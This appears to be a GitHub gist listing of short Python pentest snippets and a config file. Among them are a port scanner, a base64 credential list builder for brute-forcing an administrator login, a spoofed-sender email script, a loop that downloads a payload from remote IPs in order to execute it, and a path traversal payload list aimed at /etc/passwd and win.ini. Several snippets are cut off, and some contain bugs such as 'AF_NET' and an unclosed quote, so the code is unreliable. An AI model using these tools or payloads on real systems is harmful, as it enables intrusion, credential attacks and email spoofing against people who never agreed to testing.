Duy K. samduy
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import socket as sk | |
| for port in range(1,1024): | |
| try: | |
| s=sk.socket(sk.AF_NET,sk.SOCK_STREAM) | |
| s.settimeout(1000) | |
| s.connect(('127.0.0.1',port)) | |
| print '%d: OPEN' % (port) | |
| s.close | |
| except: continue |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| import base64 | |
| file1=open("pwd.lst","r") | |
| file2=open("b64pwds.lst,"w") | |
| for line in file1: | |
| clear = "administrator:" + str.strip(line) | |
| new = base64.encodestring(clear) | |
| file2.write(new) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import glob, re | |
| for msg in glob.glob('/tmp/*.txt'): | |
| filer = open((msg),'r') | |
| data = filer.read() | |
| message = re.findall(r'<message>(.*?)>/message>', data, re.DOTALL) | |
| print "File %s contains %s" % (str(msg), message) | |
| filer.close() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Create SSL cert (follow prompts for customization) | |
| # > openssl req -new -x509 -keyout cert.pem -out cert.pem -days 365 -nodes | |
| # Create httpserver.py | |
| import BaseHTTPServer,SimpleHTTPServer,ssl | |
| cert = "cert.pem" | |
| httpd = BaseHTTPServer.HTTPServer(('192.168.1.10',443),SimpleHTTPServer.SimpleHTTPRequestHandler) | |
| httpd.socket = ssl.wrap_socket(httpd.socket,certfile=cert,server_side=True) |
samduy
/ sendmail.py
Created
December 31, 2017 13:04
Python Email Sender (sendmail must be installed)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| import smtplib, string | |
| import os, time | |
| os.system("/etc/init.d/sendmail start") | |
| time.sleep(4) | |
| HOST = "localhost" | |
| SUBJECT = "Email from spoofed sender" | |
| TO = "[email protected]" |
samduy
/ http_execute.py
Created
December 31, 2017 13:14
Loop through IP list, Download file over HTTP and Execute
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| import urllib2, os | |
| urls = ["1.1.1.1","2.2.2.2"] | |
| port = "80" | |
| payload = "cb.sh" | |
| for url in urls: | |
| u = "http://%s:%s/%s" % (url, port, payload) | |
| try: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from scapy.all import * | |
| # Add iptables rule to block attack box from sending RSTs | |
| # Create web.txt with entire GET/POST packet data | |
| fileweb = open("web.txt",'r') | |
| data = fileweb.read() | |
| ip = IP(dst="<ip>") | |
| SYN=ip/TCP(rport=RandNum(6000,7000),dport=80,flags="S",seq=4) | |
| SYNACK = sr1(SYN) | |
| ACK=ip/TCP(sport=SYNACK.dport,dport=80,flags="A",seq=SYNACK.ack,ack=SYNACK.seq+1)/data | |
| reply,error = sr(ACK) |
samduy
/ registry_hex2ascii.py
Created
December 31, 2017 13:27
Convert Windows registry hex format to readable ASCII
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import binascii, sys, string | |
| dataFormatHex = binascii.a2b_hex(sys.argv[1]) | |
| output = "" | |
| for char in dataFormatHex: | |
| if char in string.printable: output += char | |
| else: output += "." | |
| print "\n" + output |
samduy
/ path_traversal_payloads.txt
Created
January 21, 2018 15:41
List of common path traversal attacks (can be used with BurpSuite Instruder)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ../../../../../../../../../../../../etc/passwd | |
| ../../../../../../../../../../../../windows/win.ini | |
| %2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd | |
| %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd | |
| %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd | |
| %2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini | |
| %252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd | |
| %252e%252e%2f%252e%252e%2f%252e%252e%2f%252e%252e%2f%252e%252e%2f%252e%252e%2f%252e%252e%2f%252e%252e%2f%252e%252e%2fetc/passwd | |
| %2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252fetc/passwd | |
| %252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cetc/passwd |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Author: samduy@github | |
| # Clear the screen after exiting Vim | |
| altscreen on | |
| # using mouse to select region | |
| # turning this on will lose the normal mouse control like select/copy/paste | |
| #mousetrack on | |
| # turn off welcome message |
OlderNewer